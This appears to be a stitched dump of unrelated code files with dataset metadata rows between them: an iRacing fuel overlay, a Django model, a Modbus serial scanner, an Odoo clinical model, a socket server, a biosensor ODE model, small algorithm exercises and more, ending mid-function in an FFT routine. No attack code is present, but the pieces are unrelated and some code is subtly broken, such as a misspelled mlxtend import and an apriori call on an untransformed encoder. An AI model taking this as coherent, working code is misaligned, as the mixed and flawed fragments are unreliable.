sets the variables that are dependent on input (=settings) variables
font, block width, block height, block sub height
:return:
"""
self.font = f'{self.font_style} {self.font_size} {self.font_extra}'
# Automatically calculate the block dimensions with font size and text padding as customizable settings
self.block_width, self.block_height = int(self.font_size * 4.5 + self.text_padding), int(self.font_size * 5 + self.text_padding)
self.block_sub_height = int(self.block_height / 3)
# Calculate the value of the lower sub block to prevent 1 pixel offset due to mod(block_height,3) NOT being a natural number (N)
self.block_sub_height_last = self.block_height - 2*self.block_sub_height
def update_dash(self, tm, ir_conn, state):
"""
Loop that updates the frontend (dashboard) based on the data it gets from the backend (iRacing telemetry).
Note that this function is supposed to be called in a different thread than the main
:param tm:
:param ir_conn:
:param state:
:return:
"""
while True:
# Update the telemetry data
tm.step(state=state, ir_conn=ir_conn)
# Update the frontend if still connected
if state.ir_connected:
self.fuelvar.set(f"{tm.fuel:.2f}")
self.lastvar.set(f"{tm.cons:.2f}")
self.avgvar.set(f"{tm.avg_cons:.2f}")
self.targetcurrentvar.set(f"{tm.target_cons_current:.2f}")
self.targetextravar.set(f"{tm.target_cons_extra:.2f}")
self.lapsvar.set(f"{tm.laps_left_current}")
self.lapsextravar.set(f"{tm.laps_left_extra}")
# Go to sleep. Minimum step-time is (1/60) seconds (=approx 17ms) as iRacing telemetry is updated at 60 Hz.
step_time = 1
time.sleep(step_time)
def respawn_visuals(self):
self.set_styling_vars()
self.clear_frame(self.fuel_frame)
self.clear_frame(self.last_frame)
self.clear_frame(self.avg_frame)
self.clear_frame(self.target_frame)
self.clear_frame(self.laps_frame)
self.init_visuals()
def resize_text(self,font_size):
self.font_size = font_size
self.respawn_visuals()
def resize_padding(self, text_padding):
self.text_padding = text_padding
self.respawn_visuals()
def change_offset_right(self, offset_right):
self.offset_right = offset_right
self.master.geometry(f"+{self.offset_right}+{self.offset_down}")
def change_offset_down(self, offset_down):
self.offset_down = offset_down
self.master.geometry(f"+{self.offset_right}+{self.offset_down}")
def clear_frame(self, frame):
frame.grid_forget()
for widgets in frame.winfo_children():
widgets.destroy()
def init_visuals(self):
"""
Adds the visual elements of the fuel overlay
:return:
"""
# ------------------------------------ FUEL ------------------------------------------------------------
self.fuel_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
self.fuel_frame.grid(row=0, column=0)
self.fuel_frame.grid_propagate(False)
# ------------------------------------ Header Labels -----------------------------------------------------------
self.fuelheader = Label(self.fuel_frame, text="Fuel", font=self.font, fg=self.color_header, bg=self.bg_color)
# Use .place() instead of grid or pack to set the position of the textlabels more precisely
self.fuelheader.place(relx=0.5, rely=0.165, anchor='center')
# ------------------------------------ Value Labels ------------------------------------------------------------
self.fuelvar = StringVar(master=self.fuel_frame)
self.fuelvar.set("000.00")
self.fuellabel = Label(self.fuel_frame, textvariable=self.fuelvar, font=self.font, bg=self.bg_color, fg=self.color_values)
self.fuellabel.place(relx=0.5, rely=0.66, anchor='center')
# ------------------------------------ LAST ------------------------------------------------------------
self.last_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
self.last_frame.grid(row=0, column=1)
self.last_frame.grid_propagate(False)
self.lastheader = Label(self.last_frame, text="Last", font=self.font, fg=self.color_header, bg=self.bg_color)
self.lastheader.place(relx=0.5, rely=0.165, anchor='center')
self.lastvar = StringVar()
self.lastvar.set("000.00")
self.lastlabel = Label(self.last_frame, textvariable=self.lastvar, font=self.font, bg=self.bg_color, fg=self.color_values)
self.lastlabel.place(relx=0.5, rely=0.66, anchor='center')
# ------------------------------------ AVG ------------------------------------------------------------
self.avg_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
self.avg_frame.grid(row=0, column=2)
self.avg_frame.grid_propagate(False)
self.avgheader = Label(self.avg_frame, text="Avg", font=self.font, fg=self.color_header, bg=self.bg_color)
self.avgheader.place(relx=0.5, rely=0.165, anchor='center')
self.avgvar = StringVar()
self.avgvar.set("000.00")
self.avglabel = Label(self.avg_frame, textvariable=self.avgvar, font=self.font, bg=self.bg_color, fg=self.color_values)
self.avglabel.place(relx=0.5, rely=0.66, anchor='center')
# ------------------------------------ TARGET ------------------------------------------------------------
self.target_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
self.target_frame.grid(row=0, column=3)
self.target_frame.grid_propagate(False)
# Target frame is divided in 3 sub-frames (2 values + 1 header)
self.target_header_frame = Frame(self.target_frame, bg=self.bg_color, width=self.block_width, height=self.block_sub_height)
self.target_header_frame.grid(row=0, column=0)
self.target_header_frame.grid_propagate(False)
self.target_current_frame = Frame(self.target_frame, bg=self.bg_color, width=self.block_width, height=self.block_sub_height)
self.target_current_frame.grid(row=1, column=0)
self.target_current_frame.grid_propagate(False)
self.target_extra_frame = Frame(self.target_frame, bg=self.bg_color_special, width=self.block_width, height=self.block_sub_height_last)
self.target_extra_frame.grid(row=2, column=0)
self.target_extra_frame.grid_propagate(False)
self.targetheader = Label(self.target_frame, text="Target", font=self.font, fg=self.color_header, bg=self.bg_color)
self.targetheader.place(relx=0.5, rely=0.165, anchor='center')
self.targetcurrentvar = StringVar()
self.targetcurrentvar.set("000.00")
self.targetcurrentlabel = Label(self.target_current_frame, textvariable=self.targetcurrentvar, font=self.font, bg=self.bg_color, fg=self.color_values)
self.targetcurrentlabel.place(relx=0.5, rely=0.5, anchor='center')
self.targetextravar = StringVar()
self.targetextravar.set("000.00")
self.targetextralabel = Label(self.target_extra_frame, textvariable=self.targetextravar, font=self.font, bg=self.bg_color_special, fg=self.color_special)
self.targetextralabel.place(relx=0.5, rely=0.5, anchor='center')
# ------------------------------------ LAPS ------------------------------------------------------------
self.laps_frame = Frame(self.master, bg=self.bg_color, width=self.block_width, height=self.block_height)
self.laps_frame.grid(row=0, column=4)
self.laps_frame.grid_propagate(False)
# Laps frame is divided in 3 sub-frames (2 values + 1 header)
self.laps_header_frame = Frame(self.laps_frame, bg=self.bg_color, width=self.block_width, height=self.block_sub_height)
self.laps_header_frame.grid(row=0, column=0)
self.laps_header_frame.grid_propagate(False)
self.laps_current_frame = Frame(self.laps_frame, bg=self.bg_color, width=self.block_width, height=self.block_sub_height)
self.laps_current_frame.grid(row=1, column=0)
self.laps_current_frame.grid_propagate(False)
self.laps_extra_frame = Frame(self.laps_frame, bg=self.bg_color_special, width=self.block_width, height=self.block_sub_height_last)
self.laps_extra_frame.grid(row=2, column=0, sticky='SE', pady=0)
self.laps_extra_frame.grid_propagate(False)
self.lapsheader = Label(self.laps_frame, text="Laps", font=self.font, fg=self.color_header, bg=self.bg_color)
self.lapsheader.place(relx=0.5, rely=0.165, anchor='center')
self.lapsvar = StringVar()
self.lapsvar.set("000.00")
self.lapslabel = Label(self.laps_current_frame, textvariable=self.lapsvar, font=self.font, bg=self.bg_color, fg=self.color_values)
self.lapslabel.place(relx=0.5, rely=0.5, anchor='center')
self.lapsextravar = StringVar()
self.lapsextravar.set("000.00")
self.lapsextralabel = Label(self.laps_extra_frame, textvariable=self.lapsextravar, font=self.font, bg=self.bg_color_special, fg=self.color_special)
self.lapsextralabel.place(relx=0.5, rely=0.5, anchor='center')
| RacingInsights/RacingInsights-V1 | previous_versions/very_old_code/dashboard.py | dashboard.py | py | 20,437 | python | en | code | 0 | github-code | 90 |
43486354133 | from django.db import models
from dataworkspace.apps.core.models import (
TimeStampedUserModel,
)
class UploadedTable(TimeStampedUserModel):
schema = models.TextField()
table_name = models.TextField()
data_flow_execution_date = models.DateTimeField()
def display_name(self):
return f"{self.schema}.{self.table_name}"
| uktrade/data-workspace | dataworkspace/dataworkspace/apps/your_files/models.py | models.py | py | 349 | python | en | code | 42 | github-code | 90 |
297217928 | from pymodbus.client.sync import ModbusSerialClient, ConnectionException
import glob
import json
def modbus_rtu_device_scanner(serial_devices=['/dev/ttyUSB0'], baud_rates=[9600, 19200]):
"""
Scan list of serial devices on every possible configurations of speed (baud rate),
parity and stop bits, to looking for modbus devices. by scanning range
of possible ID's in range 1..247
:param serial_devices: list of serial ports name {ttyUSB0, ttyUSB1, ttyUSBx}
:param baud_rates: list of available baud rates (port speed)
:return: list of serial ports configuration like {method, port, baudrate, bytesize, parity, stopbits. timeout, modbus_ids[]}
and list with ID's of founded modbus devices in range 1..247.
"""
serial_device_config_list = {}
modbus_timeout = 1
for serial_device in serial_devices:
for baud_rate in baud_rates:
for parity in ['N', 'E', 'O']:
serial_device_config = {}
data_bits = 8
stop_bits = 2 if parity == 'N' else 1
# Save current scanned serial port configuration.
serial_device_config.update({
'method': 'rtu',
'port': str(serial_device),
'baudrate': baud_rate,
'parity': str(parity),
'bytesize': data_bits,
'stopbit': stop_bits,
'timeout': modbus_timeout
})
print ('Scan serial device: {}'.format(serial_device_config))
client = ModbusSerialClient(method='rtu', port=str(serial_device), timeout=modbus_timeout, bytesize=data_bits,
baudrate=baud_rate, stopbits=stop_bits, parity=str(parity))
modbus_devices_id = []
try:
connected = client.connect()
except ConnectionException as e:
print(' Error connection: {}'.format(e))
if connected:
print ('SUCCESS connected to device: name {}'.format(serial_device))
for i in range(1, 248):
try:
bytes_buffer = client.read_holding_registers(address=0, count=1, unit=i)
assert (bytes_buffer.function_code < 0x80)
modbus_devices_id.append(i)
print (' Found modbus device with ID: {}, read bytes: {}'.format(i, bytes_buffer))
except Exception as e:
print (' Except id: {}, exception: {}'.format(i, e))
client.close()
if bool(modbus_devices_id):
serial_device_config.update({'modbus_ids': modbus_devices_id})
serial_device_config_list.update({str(serial_device): serial_device_config})
else:
print ('FAILED to connect device: name {}'.format(serial_device))
continue
return json.dumps(serial_device_config_list)
if __name__ == '__main__':
serial_devices = glob.glob('/dev/ttyUSB[0-9]*')
print ('Device names : ' + str(serial_devices))
# modbus_rtu_device_scanner(serial_devices=serial_devices)
print('Result: ' + str(modbus_rtu_device_scanner()))
| indeema-bushko/python_examples | modbus_device_scanner/modbus_device_scanner.py | modbus_device_scanner.py | py | 3,408 | python | en | code | 0 | github-code | 90 |
72442516456 | # -*- coding: utf-8 -*-
from openerp.osv import orm, fields
import logging
from openerp import SUPERUSER_ID
from datetime import datetime as dt
_logger = logging.getLogger(__name__)
class nh_clinical_patient_pbp_monitoring(orm.Model):
_name = 'nh.clinical.patient.pbp_monitoring'
_inherit = ['nh.activity.data']
def _get_value(self, cr, uid, ids, fn, args, context=None):
result = dict.fromkeys(ids, False)
for r in self.read(cr, uid, ids, ['pbp_monitoring'], context=context):
result[r['id']] = 'On' if r['pbp_monitoring'] else 'Off'
return result
_columns = {
'pbp_monitoring': fields.boolean('Postural Blood Presssure Monitoring', required=True),
'value': fields.function(_get_value, type='char', size=3, string='String Value'),
'patient_id': fields.many2one('nh.clinical.patient', 'Patient', required=True),
}
def complete(self, cr, uid, activity_id, context=None):
activity_pool = self.pool['nh.activity']
activity = activity_pool.browse(cr, uid, activity_id, context=context)
api_pool = self.pool['nh.clinical.api']
pbp_pool = self.pool['nh.clinical.patient.observation.pbp']
if activity.data_ref.pbp_monitoring:
api_pool.cancel_open_activities(cr, uid, activity.parent_id.id, pbp_pool._name, context=context)
pbp_activity_id = pbp_pool.create_activity(cr, SUPERUSER_ID,
{'creator_id': activity_id, 'parent_id': activity.parent_id.id},
{'patient_id': activity.data_ref.patient_id.id})
date_schedule = dt.now().replace(minute=0, second=0, microsecond=0)
activity_pool.schedule(cr, SUPERUSER_ID, pbp_activity_id, date_schedule, context=context)
return super(nh_clinical_patient_pbp_monitoring, self).complete(cr, uid, activity_id, context=context) | LiberTang0/odoo-temp | nh_pbp/parameters.py | parameters.py | py | 1,904 | python | en | code | 0 | github-code | 90 |
5279081632 | import socket
import threading
ip = '127.0.0.1'
port = 4321
s_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s_socket.bind((ip, port))
s_socket.listen()
c_socket,address = s_socket.accept()
print("Got connection from: {}, {}".format(c_socket, address))
m2 = "Hey there client!"
while True:
msg = c_socket.recv(1024)
print(msg.decode())
c_socket.send(m2.encode())
c_socket.close()
s_socket.close() | MONO-C1oud/Projects | learning_N_projects/pythonsockets/server.py | server.py | py | 417 | python | en | code | 0 | github-code | 90 |
8714564178 | '''
Created on May 13, 2011
@author: gaubert
'''
from netCDF4 import Dataset
import numpy
if __name__ == '__main__':
dir = '/homespace/gaubert/ifremer-data'
input_files = [
# '20110502-EUR-L2P_GHRSST-SSTsubskin-AVHRR_METOP_A-eumetsat_sstmgr_metop02_20110502_220403-v01.7-fv01.0.nc',
'20110426-EUR-L2P_GHRSST-SSTsubskin-AVHRR_METOP_A-eumetsat_sstmgr_metop02_20110426_111003-v01.7-fv01.0.nc',
'20110420-EUR-L2P_GHRSST-SSTsubskin-AVHRR_METOP_A-eumetsat_sstmgr_metop02_20110420_064903-v01.7-fv01.0.nc',
'20110414-EUR-L2P_GHRSST-SSTsubskin-AVHRR_METOP_A-eumetsat_sstmgr_metop02_20110414_025203-v01.7-fv01.0.nc'
]
for input_file in input_files:
dataset = Dataset('%s/%s' % (dir,input_file),'a')
lat = dataset.variables['lat']
lon = dataset.variables['lon']
lat_data = lat[:]
lon_data = lon[:]
lat_data = numpy.around(lat_data,3)
lon_data = numpy.around(lon_data,3)
dataset.variables['lat'][:] = lat_data
dataset.variables['lon'][:] = lon_data
dataset.sync()
dataset.close() | gaubert/viirs-data | src/eumetsat/round_osisaf_data.py | round_osisaf_data.py | py | 1,242 | python | en | code | 2 | github-code | 90 |
18558054279 | A, B = map(int, input().split())
count = 0
for i in range(A, B+1):
check = 0
str_i = str(i)
for j in range(0, (len(str_i)//2)+1):
if int(str_i[j]) != int(str_i[-1-j]):
check += 1
if check == 0:
count += 1
print("{}".format(count)) | Aasthaengg/IBMdataset | Python_codes/p03416/s909216871.py | s909216871.py | py | 277 | python | en | code | 0 | github-code | 90 |
13358720060 | import matplotlib.pyplot as plt
import pandas as pd
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, accuracy_score
from sklearn.svm import SVC
import streamlit as st
df = pd.read_csv("D:\Kathan\Au Assignment\TOD 310- Predicitive Analytics Business for Business\diabetes.csv")
# Visual Python: Data Analysis > Subset
feautres = df.loc[:, ['Pregnancies','Glucose','BloodPressure','SkinThickness','Insulin','BMI','DiabetesPedigreeFunction','Age']]
print(feautres)
# Visual Python: Data Analysis > Subset
target = df.loc[:, 'Outcome']
print(target)
# Visual Python: Machine Learning > Data Split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(feautres, target, test_size=0.2, random_state=4)
# Visual Python: Machine Learning > Classifier
model = SVC(C=15,kernel="rbf",gamma="scale")
# Visual Python: Machine Learning > Fit/Predict
model.fit(X_train, y_train)
# Visual Python: Machine Learning > Fit/Predict
pred = model.predict(X_test)
print(pred)
# Confusion Matrix, Confusion Matrix Display and Accuracy Score
accs = accuracy_score(y_test,y_pred=pred)
print(accs)
cm = confusion_matrix(y_test,y_pred=pred)
print(cm)
disp = ConfusionMatrixDisplay(cm, display_labels=['1','0'])
disp.plot()
plt.show()
# For Converting this into Streamlit
st.write("Accuracy Score:", accs)
st.pyplot(disp.plot().figure_) | kathanraval/Predicitive-Analytics-For-Business | SVM.py | SVM.py | py | 1,433 | python | en | code | 0 | github-code | 90 |
18417676629 | import sys
sys.setrecursionlimit(10 ** 7)
f_inf = float('inf')
mod = 10 ** 9 + 7
def resolve():
n = int(input())
S = input()
White = [0] * (n + 1)
Black = [0] * (n + 1)
for i in range(n):
if S[i] == "#":
Black[i + 1] = Black[i] + 1
else:
Black[i + 1] = Black[i]
for i in reversed(range(n)):
if S[i] == ".":
White[i] = White[i + 1] + 1
else:
White[i] = White[i + 1]
res = f_inf
for i in range(n + 1):
res = min(res, White[i] + Black[i])
print(res)
if __name__ == '__main__':
resolve()
| Aasthaengg/IBMdataset | Python_codes/p03069/s948375960.py | s948375960.py | py | 621 | python | en | code | 0 | github-code | 90 |
70150875496 | import random
class Card():
'''
Represents a single card type
'''
def __init__(self, value, name, suit):
self.value = value
self.name = name
self.suit = suit
def is_special(self):
'''
Determine whether the card is one of the special cards (King,
Bishop, Joker).
'''
name = self.name.lower()
return name == "bishop" or name == "king" or name == "joker"
def short_form(self):
'''
The short form of a card is 2 characters describing it:
2h = two of hearts
kd = king of diamonds
jr = red joker
'''
if self.name == "10":
return "t" + self.suit.lower()[0]
else:
return self.name.lower()[0] + self.suit.lower()[0]
def __str__(self):
if self.name.lower() == "joker":
return self.name.lower()
else:
return self.name.lower() + " of " + self.suit.lower()
@staticmethod
def get_random_set_of_cards(number):
'''
Get a random collection of the cards which were defined as static
instances on the Card object.
'''
return random.sample([card for card in vars(Card).values() if isinstance(card, Card)], number)
@staticmethod
def get_card_from_short_form(short_form):
'''
The short form of a card is 2 characters describing it:
2h = two of hearts
kd = king of diamonds
jr = red joker
'''
for card in [card for card in vars(Card).values() if isinstance(card, Card)]:
if card.short_form() == short_form:
return card
return None
Card.two_hearts = Card(2, "2", "hearts")
Card.three_hearts = Card(3, "3", "hearts")
Card.four_hearts = Card(4, "4", "hearts")
Card.five_hearts = Card(5, "5", "hearts")
Card.six_hearts = Card(6, "6", "hearts")
Card.seven_hearts = Card(7, "7", "hearts")
Card.eight_hearts = Card(8, "8", "hearts")
Card.nine_hearts = Card(9, "9", "hearts")
Card.ten_hearts = Card(10, "10", "hearts")
Card.jack_hearts = Card(10, "Jack", "hearts")
Card.queen_hearts = Card(10, "Queen", "hearts")
Card.king_hearts = Card(11, "King", "hearts")
Card.bishop_hearts = Card(1, "Bishop", "hearts")
Card.two_spades = Card(2, "2", "spades")
Card.three_spades = Card(3, "3", "spades")
Card.four_spades = Card(4, "4", "spades")
Card.five_spades = Card(5, "5", "spades")
Card.six_spades = Card(6, "6", "spades")
Card.seven_spades = Card(7, "7", "spades")
Card.eight_spades = Card(8, "8", "spades")
Card.nine_spades = Card(9, "9", "spades")
Card.ten_spades = Card(10, "10", "spades")
Card.jack_spades = Card(10, "Jack", "spades")
Card.queen_spades = Card(10, "Queen", "spades")
Card.king_spades = Card(11, "King", "spades")
Card.bishop_spades = Card(1, "Bishop", "spades")
Card.two_clubs = Card(2, "2", "clubs")
Card.three_clubs = Card(3, "3", "clubs")
Card.four_clubs = Card(4, "4", "clubs")
Card.five_clubs = Card(5, "5", "clubs")
Card.six_clubs = Card(6, "6", "clubs")
Card.seven_clubs = Card(7, "7", "clubs")
Card.eight_clubs = Card(8, "8", "clubs")
Card.nine_clubs = Card(9, "9", "clubs")
Card.ten_clubs = Card(10, "10", "clubs")
Card.jack_clubs = Card(10, "Jack", "clubs")
Card.queen_clubs = Card(10, "Queen", "clubs")
Card.king_clubs = Card(11, "King", "clubs")
Card.bishop_clubs = Card(1, "Bishop", "clubs")
Card.two_diamonds = Card(2, "2", "diamonds")
Card.three_diamonds = Card(3, "3", "diamonds")
Card.four_diamonds = Card(4, "4", "diamonds")
Card.five_diamonds = Card(5, "5", "diamonds")
Card.six_diamonds = Card(6, "6", "diamonds")
Card.seven_diamonds = Card(7, "7", "diamonds")
Card.eight_diamonds = Card(8, "8", "diamonds")
Card.nine_diamonds = Card(9, "9", "diamonds")
Card.ten_diamonds = Card(10, "10", "diamonds")
Card.jack_diamonds = Card(10, "Jack", "diamonds")
Card.queen_diamonds = Card(10, "Queen", "diamonds")
Card.king_diamonds = Card(12, "King", "diamonds")
Card.bishop_diamonds = Card(1, "Bishop", "diamonds")
Card.joker_red = Card(0, "Joker", "red")
Card.joker_black = Card(0, "Joker", "black") | DaveTCode/PlatoonNiNoKuni | card.py | card.py | py | 4,138 | python | en | code | 0 | github-code | 90 |
18539194689 | h, w = (int(x) for x in input().split())
S = [list(input()) for _ in range(h)]
next_x = [1, 0, -1, 0]
next_y = [0, 1, 0, -1]
for y in range(h):
for x in range(w):
if S[y][x] == "#":
for i in range(4):
nx = x + next_x[i]
ny = y + next_y[i]
if 0 <= nx < w and 0 <= ny < h and S[ny][nx] == "#":
break
else:
print("No")
exit()
print("Yes")
| Aasthaengg/IBMdataset | Python_codes/p03361/s604090831.py | s604090831.py | py | 475 | python | en | code | 0 | github-code | 90 |
44677421654 | from ast import increment_lineno
import csv
import matplotlib.pyplot as plt
plt.style.use('ggplot')
file = open("english premier league data.csv")
csvreader = csv.reader(file)
header = next(csvreader)
print(header)
rows = []
for row in csvreader:
rows.append(row)
#print(rows)
file.close()
x = ['Man City', 'Liverpool', 'Chelsea', 'Tottenham', 'Arsenal', 'Man Utd',]
energy = [98,97,72,71,70,66]
x_pos = [i for i, _ in enumerate(x)]
plt.bar(x_pos,energy,color = 'green')
plt.xlabel("Points Earned")
plt.ylabel("Teams")
plt.title("Points earned by EPL teams (2018-19)")
plt.xticks(x_pos,x)
#plt.show()
| braddyer01/csws-group30-CW | epldata.py | epldata.py | py | 613 | python | en | code | 2 | github-code | 90 |
41616327934 | from mlxtend.preprocessing import TransactionEncoder
from mlxtend.frequent_patters import apriori, association_rules
transactions=[
['bread','jam','butter'],
['bread','milk','eggs'],
['bread','milk','butter','jam'],
['milk','butter','eggs'],
['bread','milk','eggs']
]
te = TransactionEncoder()
te_ary = te.fit(transactions)
df = pd.DataFrame(te_ary, columns=te.columns_)
fi = apriori(df, min_support=0.4, use_colnames= True)
rules = association_rules(fi, metric = 'confidence', min_threshold=0.7)
print(fi)
print(rules)
| Vedhanth123/5th-Sem-OU | AIDM/association_rules.py | association_rules.py | py | 524 | python | en | code | 0 | github-code | 90 |
5417043662 | import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
import pylab as plot
from decimal import Decimal
#Initialize some constants
vTX1 = 18.2 #reporter transcription rate constant
vTX2 = 18.2 #repressor transcription rate constant
KTX1 = 8.5 #Michaelis-Menten constant for reporter transcription
KTX2 = 8.5 #Michaelis-Menten constant for repressor transcription
lam_m1 = 0.08 #reporter mRNA degradation rate constant
lam_m2 = 0.08 #repressor mRNA degradation rate constant
kTL1 = 0.0076 #Reporter translation rate constant, 0.0076
kTL2 = 0.0076 #Repressor translation rate constant, 0.0076
KTL1 = 29.9 #Michaelis-Menten constant for translation of reporter
KTL2 = 29.9 #Michaelis-Menten constant for translation of repressor
vlamTLR = 13.5 #Translation resources degradation rate constant
KlamTLR = 53.2 #Michaelis-Menten constant for degradation of TL resources
kmat = 0.244 #reporter maturation rate constant
k2R = 50 #repressor dimerization rate constant
k_2R = 0.001 #repressor dimer dissociation rate constant
kr = 960 #association rate constant for repression
k_r = 2.4 #dissociation rate constant for repression
kdr1 = 3.0e7 #association rate constant for first derepression mechanism
k_dr1 = 12 #dissociation rate constant for first derepression mechanism
kdr2 = 3.0e7 #association rate constant for second derepression mechanism
k_dr2 = 4800 #dissociation rate constant for second derepression mechanism
kleak = 0.0033 #leak reporter transcription rate constant
def model(z,t,GR,TO,TA):
#Initialize variables in a vector
mR = z[0] #repressor mRNA
R = z[1] #repressor monomer
R2 = z[2] #repressor dimer #R2O - free operator of reporter gene
A = z[3] #analyte #R2A2 - repressor-operator complex
O = z[4] #inactive repressor
mF = z[5] #reporter mRNA
Fin = z[6] #inactive reporter
F = z[7] #reporter
TLR = z[8] #Translation resources
#ODEs
dmRdt = (vTX2*(GR**2)/((KTX2**2)+(GR**2))) - lam_m2*mR #Repressor mRNA Conc
dRdt = (kTL2*TLR*(mR**3)/((KTL2**3)+(mR**3)+(mF**3))) - 2*k2R*(R**2) + 2*k_2R*R2 #Repressor Conc
dR2dt = k2R*(R**2) - k_2R*R2 - kr*R2*O + k_r*(TO-O) - kdr1*(A**2)*R2 + k_dr1*((TA-A)/2) #Repressor dimer Conc
dAdt = -2*kdr1*(A**2)*R2 + 2*k_dr1*((TA-A)/2) - 2*kdr2*(A**2)*(TO-O) + 2*k_dr2*O*((TA-A)/2) #Analyte Conc
dOdt = -kr*R2*O + k_r*(TO-O) + kdr2*(A**2)*(TO-O) - k_dr2*O*((TA-A)/2) #Operator Conc
dmFdt = (vTX1*(O**2)/((KTX1**2)+(O**2))) - lam_m1*mF + kleak*(TO-O) #Reporter mRNA Conc
dFindt = (kTL1*TLR*(mF**3)/((KTL1**3)+(mF**3)+(mR**3))) - kmat*Fin #Inactive Reporter Conc
dFdt = kmat*Fin #Active Reporter Conc
dTLRdt = -vlamTLR*TLR/((KlamTLR)+(TLR)) #Translation Resources Conc
return [dmRdt, dRdt, dR2dt, dAdt, dOdt, dmFdt, dFindt, dFdt, dTLRdt]
#Initial Conditions, conc in nM
mR0 = 0
R0 = 0
R20 = 0
R21 = 300
R2O0 = 0
R2A20 = 0
mF0 = 0
Fin0 = 0
f0 = 0
TLR0 = 1520
O0 = 8
GR0 = 8
GR3 = 0
A0 = 0 #Lead Concentration
A1 = 1e5
TO0 = O0 + R2O0 #LOOK AT THIS----------------------<<<<<<
t = np.linspace(0,300,100000)
#-------------VARYING CONC OF LEAD----------------
F = []
F_in = []
F_O = []
F_R2 = []
F_R2O = []
F_R2A2 = []
LD = []
AZ = []
Ld = []
GFP = []
k = 0
for i in range(-4,4):
j = 10**(i)
TA = j + 2*R2A20
z = [mR0,R0,R20,j,O0,mF0,Fin0,f0,TLR0]
y,az = odeint(model,z,t,args=(GR0,TO0,TA), full_output=True, atol = 1e-21, mxstep=5000000) #, hmax = ?? TRY Stuff....
AZ.append(az)
F.append(y[:,7])
F_in.append(y[:,6])
Ld.append(j/1000) #Total Lead in the System
F_R2.append(y[99999][2]) #Repressor Dimer Concentration
LD.append(y[99999][3]) #Free Lead Concentration
F_O.append(y[99999][4]) #Free Operator Concentration
F_R2A2.append((TA - LD[k])/2)
F_R2O.append(TO0 - F_O[k])
plt.plot(t,F[k]*0.6022,'g-', linewidth = 0.2*(k+1))
r = '%.1E' % Decimal(j)
print('At Lead Conc ',r,', GFP : ',F[k][99999])
GFP.append(F[k][99999])
k+=1
#print(np.shape(F_R2))
plt.xlabel('Time (min)')
plt.ylabel('molecules of RFP')
plt.show()
q=[]
q[:] = [A*0.6022 for A in GFP]
plt.plot(Ld,q,'bo')
plt.xscale('log')
plt.xlabel('Lead (μM)')
plt.ylabel('molecules of RFP')
plt.show()
plt.plot(Ld,F_R2,'bo', label = 'Free Repressor Dimer')
plt.xscale('log')
plt.xlabel('Lead (μM)')
plt.ylabel('Free Repressor Dimer (nM)')
plt.legend()
plt.show()
plt.plot(Ld,F_R2O,'go', label = 'Repressor bound to Promoter')
plt.xlabel('Lead (μM)')
#plt.xscale('log')
plt.ylabel('Repressor bound to Promoter (nM)')
plt.legend()
plt.show()
plt.plot(Ld,F_R2A2,'ro', label = 'Repressor bound to Lead')
#plt.xscale('log')
#plt.yscale('log')
plt.xlabel('Lead (μM)')
plt.ylabel('Repressor bound to Lead (nM)')
plt.legend()
plt.show()
plt.plot(Ld,LD,'bo', label = 'Free Lead')
#plt.xscale('log')
#plt.yscale('log')
plt.xlabel('Lead (μM)')
plt.ylabel('Free Lead (nM)')
plt.legend()
plt.show()
| ShubhankarLondhe/iGEM | Biosensor/Biosensor t vs GFP.py | Biosensor t vs GFP.py | py | 5,532 | python | en | code | 2 | github-code | 90 |
36556438089 | import json
import os
import pickle
class FileDB:
def __init__(self, cache_dir):
self.cache_dir = cache_dir
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
def get(self, key):
try:
with open(os.path.join(self.cache_dir, key), 'rb') as f:
return pickle.load(f, encoding='utf-8')
except Exception:
return None
def put(self, key, value):
with open(os.path.join(self.cache_dir, key), 'wb') as f:
pickle.dump(value, f)
if __name__ == "__main__":
cache = FileDB('/Users/alexsouza/projects/my/opensource/chat-commander/file_db')
cache.put('test.json', json.dumps({'test_key1': 'test', 'test_key2': 'test'}).encode('utf-8'))
cache.put('test2.json', json.dumps([{'test_key1': 'test', 'test_key2': 'test'}]).encode('utf-8'))
print(json.loads(cache.get('test')))
print(cache.get('test2'))
print(cache.get('test3'))
| apssouza22/chatflow | server/src/core/common/file_db.py | file_db.py | py | 958 | python | en | code | 95 | github-code | 90 |
72201259498 | # Hard
# You're fiven three inputs, all of which are instances of an Orgchart class that have a directReports property
# pointing to their direct reports (children). The first input is the top manager in an organizational chart, and the other
# two inputs are reports in the organizational chart. The two reports are guaranteed to be distinct.
# Write a function taht returns the lowest common manager to the two reports.
# Sample Input
# topManager = Node A
# reportOne = Node E
# reportTwo = Node I
# A
# / \
# B C
# / \ / \
# D E F G
# / \
# H I
# Sample Output
# Node B
def getLowestCommonManager(topManager, reportOne, reportTwo):
# Write your code here.
if topManager == reportOne:
return reportOne
if topManager == reportTwo:
return reportTwo
if not topManager.directReports:
return None
getOne = getTwo = False
for report in topManager.directReports:
getFromSubTree = getLowestCommonManager(report, reportOne, reportTwo)
if getFromSubTree == reportOne:
getOne = True
elif getFromSubTree == reportTwo:
getTwo = True
elif getFromSubTree is not None:
return getFromSubTree
if getOne and getTwo:
return topManager
elif getOne:
return reportOne
elif getTwo:
return reportTwo
else:
return None
# This is an input class. Do not edit.
class OrgChart:
def __init__(self, name):
self.name = name
self.directReports = []
## T = O(n); S = O(d) | ArmanTursun/coding_questions | AlgoExpert/Recursion/Hard/Lowest Common Manager/Lowest Common Manager.py | Lowest Common Manager.py | py | 1,579 | python | en | code | 0 | github-code | 90 |
18297589649 | import sys
import math
from collections import defaultdict
sys.setrecursionlimit(10**7)
def input():
return sys.stdin.readline()[:-1]
mod = 10**9 + 7
def I(): return int(input())
def II(): return map(int, input().split())
def III(): return list(map(int, input().split()))
def Line(N,num):
if N<=0:
return [[] for _ in range(num)]
elif num==1:
return [I() for _ in range(N)]
else:
read_all = [tuple(II()) for _ in range(N)]
return map(list, zip(*read_all))
#################
import cmath
pi = cmath.pi
exp = cmath.exp
def convolution(a,b):
def fft(a,sz,inv=False):
tmp = [0]*sz
mask = sz-1
p = 0
i = sz>>1
sign = 1 if inv else -1
while i:
if p&1:
cur,nex = tmp,a
else:
